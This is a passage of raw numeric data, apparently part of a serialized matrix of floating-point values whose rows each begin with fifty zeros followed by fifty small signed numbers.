0.0769, 0.01059, 0.2369, 0.0048, 0.8823, 0.3647, -0.627, 0.0966, 0.004494, -0.3298, -1.816, 0.1133, 1.207, -0.004265, 0.1186, 0.04092, 0.5913, -1.388, -0.3184, 0.08057, 0.03842, -0.389, 0.568, 0.2063, 0.3396, 0.0747, -0.05066, -0.3118, -0.5913, 2.188, -0.02853, 0.2783, -0.4902, 0.97, 0.4507, -1.456, -0.00643, 0.2437, 0.2136, -0.2878, 0.01087, -0.0423, -0.3665, -0.114, 0.3042], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.187, 0.3682, 0.4028, 0.04324, 0.5913, -0.3413, 0.2834, 0.00788, -0.00491, -0.2155, -0.1598, -0.217, -0.6685, 0.02069, 0.07214, -0.0763, 0.469, -0.713, 0.0289, -0.0881, 0.04453, -0.5474, -0.05997, -0.08435, 0.1396, 0.307, 0.04465, -0.0266, -0.0782, -0.277, -0.2173, -0.1936, 0.2505, -0.1301, 1.062, 0.0565, 0.5312, -0.2903, 0.6284, 0.0691, -0.4841, -0.0311, 0.764, -0.06555, -0.01124, -0.02606, 0.01091, 0.683, 0.02332, -0.3179], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1288, 0.539, 0.0477, 0.3293, -0.1738, 0.4321, -0.8613, -0.1044, 0.0471, -1.2295, -1.096, -0.872, 0.0729, 0.02338, -0.896, 0.83, -0.4182, -0.462, 0.04376, 0.747, -0.01505, 0.1865, 0.9854, -0.1863, 0.1671, 0.1453, -0.0599, 0.714, 0.07446, 0.2383, -0.9976, -0.1731, 0.4053, -0.556, 1.371, 0.01912, -0.3083, 0.1578, 1.315, 0.3655, -6.195, 4.53e-05, -0.1608, -0.2676, 0.3928, -0.04657, 0.02441, 0.1925, 0.1483, -0.283], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.096, 1.062, 0.775, 0.05002, 0.2556, -0.4202, -0.6226, 0.4375, 0.034, 0.4045, 0.4429, 1.189, 0.598, 0.005684, 0.0525, 0.2402, -0.3247, 0.793, 0.02135, 0.1315, -0.0003395, -0.6963, -0.1387, 0.9844, -0.02068, 0.2068, -0.1578, -0.5444, 0.627, -0.2443, 0.1168, -0.2998, 0.913, 0.669, -0.6616, 0.03766, 0.04095, 0.03827, 0.689, 0.1687, 0.1874, 0.03204, 0.0003266, -0.3674, -0.7104, -0.02739, 0.01955, 0.7197, 0.06586, -0.01045], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.157, 1.28, 0.2167, -2.219, -1.404, -0.724, 0.2079, 0.4224, 0.04077, -1.311, -3.83, -4.684, -5.418, -0.04596, -0.02469, -0.1109, 0.0632, 0.876, -0.03041, 0.1691, 0.00954, 0.1411, 0.1555, -0.2893, -0.006958, 0.1511, 0.9355, -0.1599, 0.1777, 0.000599, -1.229, 0.2869, 0.6562, -1.096, -0.95, -0.02553, 0.58, 0.0421, 0.785, 0.1337, -0.4333, 0.0003924, 0.542, 0.1433, 0.9717, -0.0096, -0.02667, -4.336, -0.3052, -0.08734], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2448, -0.1965, 0.3975, -0.04852, -1.329, 0.145, 0.2399, 0.4246, 0.04932, -0.04538, 0.02022, 0.3542, -0.4197, -0.02858, -0.0905, 0.1057, -0.06696, -0.1974, 0.01266, -0.1991, -0.000937, -0.378, -0.1176, -0.07074, 0.0958, 0.4146, 0.219, -0.2952, -0.1573, -0.2223, -0.1385, -0.03662, 0.352, 0.2073, 0.8735, 0.04102, 0.157, -0.136, 0.1737, -0.548, -0.1113, -0.05072, 0.001236, -0.1367, -0.0703, -0.00259, 0.0399, 1.557, -0.1175, -0.04376], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04977, 0.04352, -0.03864, 0.0209, 0.0219, -0.02293, -0.01344, -0.0168, 0.0459, -0.0497, -0.04874, -0.007416, -0.02255, -0.01156, 0.02338, -0.004032, -0.003084, -0.02222, -0.01529, -0.0444, 0.0456, -0.0415, -0.03226, -0.04602, -0.03732, -0.022, -0.01868, -0.03345, -0.02733, 0.006138, 0.02785, -0.04538, -0.03638, -0.04178, 0.02573, -0.0447, 0.0421, 0.0397, -0.03464, 0.0367, 0.0186, -0.001802, 0.01161, -0.03708, -0.03946, -0.0261, 0.0371, 0.02608, 0.02322, -0.02492], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3474, -0.7314, 0.92, -0.5464, -0.1835, -0.2058, -1.047, 0.2448, -0.004555, -0.411, -0.3777, 0.0716, 1.229, 0.015205, 0.617, -0.3064, 0.1957, -0.3315, 0.03824, 0.1777, -0.03445, 0.484, 1.328, -0.1859, -0.02202, -0.731, 0.2805, -0.002882, -0.02455, -0.1737, -0.2408, -0.2465, -0.02423, -0.0893, 0.389, 0.02791, 0.59, 0.3457, 0.05563, -0.2437, -0.1321, 0.0248, 0.523, 0.2764, -0.276, 0.0394, 0.00958, -0.3513, 0.2051, 0.03345], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1028, -0.144, -0.02554, -0.0694, 0.5977, 0.0178, -0.457, -0.6934, 0.01686, -0.388, -0.03226, -0.2644, -0.1852, -0.02321, 0.2178, -0.5454, 0.2898, -0.9995, 0.0337, 0.2551, 0.002415, 0.3406, 0.6885, 0.0742, 0.003696, 0.4526, -0.002401, -0.2152, 0.2034, 0.4038, -0.1757, 0.049, -0.4683, 0.674, -2.021, 0.008224, 0.3206, -0.4692, 0.326, -0.3552, 0.6387, -0.00974, 0.3044, 0.3015, -0.737, 0.03262, 0.04004, -1.672, -0.218, -0.01746], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.165, -0.449, 0.03049, 0.2595, 0.0529, -0.1176, -0.806, 0.533, -0.04092, -0.4685, 0.3005, -0.415, 1.062, -0.0389, -0.1632, 0.2317, -0.0837, -0.0399, -0.00011945, 0.434, 0.02827, 1.043, 0.06058, 0.2832, -0.001966, 0.259, -0.2803, -0.434, -0.0852, 0.439, 0.1432, 0.2876, -0.2834, 0.462, -0.682, 0.00415, 0.644, 0.01552, 0.1973, 0.6494, -0.632, 0.001512, -0.3284, -0.1476, -0.03656, 0.00681, 0.03116, -1.149, -0.822, -0.664], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0421, 0.05084, 0.02278, 0.2426, -0.0988, 0.06964, -0.3792, -0.2979, 0.02068, -0.3206, -0.15, 0.2374, 0.01452, -0.02126, -0.0281, -0.215, 0.188, 0.477, -0.01023, 0.1138, -0.02972, -0.343, -0.286, -0.1288, 0.1431, -0.186, -0.0623, -0.294, 0.00924, -0.0624, -0.1674, -0.009964, 0.587, -0.2385, -0.4907, -0.006977, -0.2422, 0.1165, 0.3186, -0.083, -0.13, 0.02037, -0.11676, 0.09766, 0.264, 0.005276, 0.02467, 0.2644, -0.2603, -0.10516], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01491, 0.0232, -0.04218, 0.002293, 0.01924, 0.001015, -0.03702, -0.02106, -0.04926, 0.0277, -0.03525, 0.036, 0.01833, -0.02095, 0.01553, -0.04523, -0.001472, 0.00272, -0.0436, -0.05215, -0.00651, -0.0313, -0.02336, -0.05505, -0.0452, 0.002556, -0.049, 0.01201, -0.05524, -0.01221, 0.04037, -0.04907, 0.01884, -0.0416, 0.04758, 0.03275, 0.01727, -0.005226, 0.03336, 0.02444, 0.045, 0.02844, -0.01061, -0.01741, -0.04514, 0.006035, -0.04294, 0.01843, -0.03827, -0.02591], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.12, -0.24, 0.4822, 0.719, -0.2964, -0.3965, 0.03888, -0.0713, -0.02112, 0.0876, -0.01776, 0.1328, -0.0545, -0.0098, -0.3105, 0.593, -0.1864, 0.3289, 0.04153, -0.00979, 0.042, 0.1598, 0.2109, -0.01386, -0.0332, -0.03998, 0.5234, 0.1046, 0.1598, -0.05832, -0.2043, -0.1847, -0.0917, 0.2498, -1.152, 0.03873, -0.1466, -0.05646, -0.1975, -0.05014, 0.11884, 0.0408, -0.0928, 0.1818, -0.1234, 0.0004761, -0.03076, 0.3923, 0.2573, -0.05], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.11255, 0.01973, 0.7007, 0.1832, -0.6655, -0.64, -1.682, 1.527, 0.02623, -0.4355, -0.06113, 1.331, -0.622, -0.0177, 0.4148, -0.08905, -0.9316, -0.627, -0.0366, -0.45, 0.02573, 0.185, 0.1929, -0.0731, -0.041, -0.01065, 0.905, 0.1672, -0.0691, -1.143, -0.8047, 0.0573, 0.3274, 0.69, 0.05106, 0.003546, -0.185, -0.08154, -0.1375, -0.8945, 1.504, -0.01639, -0.004547, -0.627, 0.1558, -0.0497, -0.02864, -0.613, 0.7715, 1.028], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01047, -0.5747, -0.3496, -0.1637, -0.3862, 0.2864, -0.5635, 0.7197, 0.03708, -0.3247, 0.0521, -0.01386, 0.461, -0.05472, -0.465, 0.1887, -0.2128, -0.653, -0.03946, 0.1941, -0.04672, 0.3862, 0.4648, -0.0784, -0.03476, 0.3547, -0.3552, 0.3406, -0.21, -0.00554, 0.3618, 0.693, -0.4084, -0.2666, -0.406, -0.006474, 0.278, 0.651, -0.435, -0.03543, 0.6743, -0.004814, 0.4666, -0.0953, 0.09106, 0.0345, 0.0543, -0.2141, -0.0002263, 0.5293], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1528, 0.337, 0.1443, -0.6016, -2.16, 1.153, -1.251, -1.802, 0.0471, 0.9155, -0.7593, -1.016, -0.517, 0.01158, 0.5576, 0.762, 1.495, -0.5176, 0.00543, 0.0694, -0.04794, -0.582, -0.5435, -0.2798, 0.0699, -0.911, -0.824, -0.2139, -0.08594, 0.313, -0.7197, 0.0438, -0.5884, -2.137, 0.3005, -0.00356, 0.0331, -0.4297, -0.4087, 0.3086, -0.5835, -0.03091, 0.705, 0.4998, -0.397, 0.01826, 0.01049, -0.1132, 0.5254, -0.927], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6646, 0.918, 0.3647, 1.063, 0.4446, 0.6465, -0.6465, 1.264, 0.00775, -1.746, -0.1991, 1.487, 0.3127, -0.02393, 1.098, 0.004314, -0.02902, 1.315, -0.0007625, 0.201, -0.00783, 0.4778, 1.271, -0.0945, 0.0955, 0.2888, -0.1991, 0.1175, -0.5356, -0.10504, 1.035, -0.1261, -0.495, 0.8696, -1.764, -0.04666, 0.794, -0.1245, 1.486, -0.677, -2.1, 0.00033, -0.0823, -0.2396, 0.9277, 0.03262, 0.00639, 0.628, 0.591, 0.4648], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3716, 0.07294, -0.1508, 0.08624, -0.2588, 0.05685, -0.2019, 0.0749, -0.04, -0.01805, -0.06525, 0.1816, 0.1189, -0.009926, -0.01243, 0.1742, -0.1512, 0.4814, -0.02455, 0.1887, -0.01671, 0.4006, 0.04944, 0.5083, 0.00968, 0.1525, -0.1338, 0.5107, 0.6396, 0.0505, 0.119, -0.2505, 0.3423, -0.354, 1.091, 0.02193, 0.05872, 0.0625, 0.3677, -0.27, -0.4478, -0.03824, -0.4062, -0.002972, 0.4343, -0.02528, -0.02934, -0.5806, -0.11743, -0.03415], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09796, -0.10864, 0.1735, 0.02623, -0.672, 1.577, 0.164, -0.1346, 0.02968, -0.3174, -0.09705, -0.5835, 0.5713, -0.00473, -0.6284, 0.9883, 0.3765, -0.6567, -0.02678, 0.602, 0.02747, 1.181, 1.609, -0.10645, 0.03494, 1.126, -0.7266, 0.3472, -0.1451, 1.416, 0.1896, 0.2993, 0.00311, -0.4312, -0.9053, 0.02756, 0.3499, 0.1438, 0.000586, 0.919, -0.891, -0.03503, 0.02246, 0.707, -0.0768, -0.008995, -0.0435, -0.1514, -0.634, -0.596], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7925, -0.5312, -0.3555, 0.4905, 0.1498, -0.2522, -0.00675, 0.97, 0.02937, -0.9253, 0.321, 1.163, -0.254, 0.00212, -0.895, -0.298, -0.581, 0.1306, -0.02534, 0.05814, 0.003061, 0.675, -0.665, -0.4722, -0.01799, -0.765, -0.0797, 0.05475, 0.1417, 0.4182, 0.02975, 0.2325, -0.7344, 0.859, -2.344, 0.00394, 0.112, 0.327, -0.0936, 0.02501, -0.1508, -0.02237, -0.549, -0.495, 0.2817, 0.01018, -0.00066, 0.937, -0.2247, 0.4016], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.995, -0.48, -0.6055, -0.08545, -0.9277, 0.1137, -0.5166, -0.3926, 0.01811, -0.4727, -0.5234, -0.4927, 0.426, -0.05078, 0.4849, 0.5176, -0.004402, 0.1655, 0.02963, -0.307, -0.04428, -0.8086, -0.862, 0.2751, 0.012054, -0.2368, -0.539, 0.2805, 0.3208, -0.402, -0.353, -0.3306, 0.2996, 0.1172, 0.07434, 0.02347, -0.1978, 0.0994, 0.1476, -0.6484, 0.7837, 0.01067, -0.212, -0.1918, 0.0558, -0.01369, -0.01932, -0.8545, 0.6543, 0.03604], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.9463, 0.663, 0.1235, -0.002598, 0.1838, -0.2485, 0.4067, 0.8467, -0.04565, -0.8057, 0.3364, 0.514, 1.137, 0.01403, 0.1781, -0.8574, -0.4194, 0.02582, -0.01573, 0.3723, 0.03787, -0.9966, 0.0866, -0.469, -0.01044, 0.2751, 0.0882, 0.2905, -0.07623, -0.4058, 1.205, 0.06525, 0.524, 0.5083, -3.469, -0.01993, 0.0516, 0.4412, -0.346, 0.03378, 0.48, -0.03552, -1.043, -0.4722, -0.5225, 0.00932, -0.05026, 1.328, 0.4282, 0.5835], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.45, 0.1406, -0.2783, -0.301, -0.5786, -0.05753, 0.05518, 0.003464, 0.03125, 0.2211, 0.0713, -0.408, -0.2174, 0.01889, -0.1799, -0.2703, 0.1334, 0.2247, -0.03943, -0.05716, 0.0181, 0.1406, 0.2607, 0.2223, 0.1017, 0.1984, 0.082, 0.09436, -0.4297, -0.1984, -0.4238, -0.0962, -0.03326, -0.06152, 0.5596, 0.02144, 0.1558, -0.07135, 0.2042, 0.05362, -0.02017, -0.04895, 0.02922, -0.1365, 0.411, 0.02838, -0.0498, -0.772, -0.1804, -0.0889], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3123, -0.3914, 0.262, -0.006454, -0.2427, 0.082, 0.1592, 0.2854, -0.0175, -0.2734, -0.03174, 0.1368, 0.4216, 0.015144, -0.05652, -0.0695, -0.03775, -0.1482, -0.0434, 0.09204, 0.0197, 0.353, -0.07513, 0.06097, 0.137, -0.006615, -0.1096, 0.334, 0.3438, 0.03925, 0.3254, 0.06433, 0.6206, 0.07574, 0.609, 0.03094, 0.2291, 0.11816, 0.0858, -0.547, 0.1208, 0.002123, -0.237, -0.001655, 0.05948, 0.02515, 0.00469, -0.664, -0.0412, 0.1512], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0087, 0.01675, -0.0707, -0.0665, 0.01799, -0.02562, 0.006355, -0.0367, 0.03546, -0.03763, 0.005096, -0.04462, 0.01656, -0.007713, 0.04016, -0.01714, -0.06015, 0.03534, -0.0383, -0.01988, -0.01472, 0.03445, 0.03046, -0.04776, -0.04874, 0.02599, -0.03174, -0.06097, -0.00638, -0.02922, -0.012146, -0.02757, 0.02173, 0.03726, 0.01477, 0.03195, 0.01413, -0.0123, 0.005165, -0.03995, -0.0238, -0.02144, -0.02048, 0.0414, -0.03903, 0.001891, -0.02359, -0.03973, -0.0322, -0.0087], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7295, 0.1127, 0.676, -0.337, -0.2546, 0.06433, 0.502, -0.05383, 0.04062, -0.305, -0.4438, 0.5474, 0.05997, 0.02669, -0.0958, 0.1681, -0.11975, 0.6826, 0.01677, 0.1914, 0.0479, -0.4539, -0.3105, 0.376, 0.09985, 0.06573, 0.06128, 0.06207, -0.3364, -0.0673, -0.1682, -0.00719, 0.1967, 0.04462, 0.988, 0.01477, 0.0702, -0.06006, -0.0628, -0.1633, 0.4307, 0.006424, -0.3867, 0.1196, -0.2957, 0.0171, 0.052, -0.8643, 0.4028, -0.077], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2474, 0.793, -0.1324, 0.1613, 1.14, -0.3296, 0.3538, -0.5894, 0.02426, 1.278, 0.00849, 0.4026, -0.4392, -0.01923, -0.9985, -0.4634, 0.07306, -0.2559, -0.009865, -0.1426, -0.0192, -0.6123, -1.384, 0.4448, -0.01729, -0.1646, 0.01509, -0.2291, 0.1676, -0.2262, -0.2708, -0.5073, -0.1646, 0.0969, -1.204, -0.0453, -0.3691, -0.549, 0.1992, 0.081, 0.8896, 0.02003, 1.008, -0.06964, -0.1272, -0.02708, -0.0346, 0.9478, -0.05524, -0.2102], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1808, -0.571, 0.4368, -0.8833, -0.3198, -0.4927, -0.9497, 0.03845, 0.01685, -0.8516, -0.211, -0.001687, -0.1682, -0.007298, -0.852, 0.2119, -0.3105, -0.1542, 0.00407, 0.3801, 0.007397, -0.91, -0.578, -0.0989, 0.02174, 0.48, 0.3684, -0.205, 0.4492, -0.004642, 0.2261, 0.5522, 0.2074, 0.8857, -0.9487, -0.04126, 0.11615, 0.06946, 0.3303, 0.2029, 0.2352, 0.04797, -0.2515, 0.09937, -0.4268, -0.02014, 0.02348, -0.8022, 0.2788, -0.1686], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 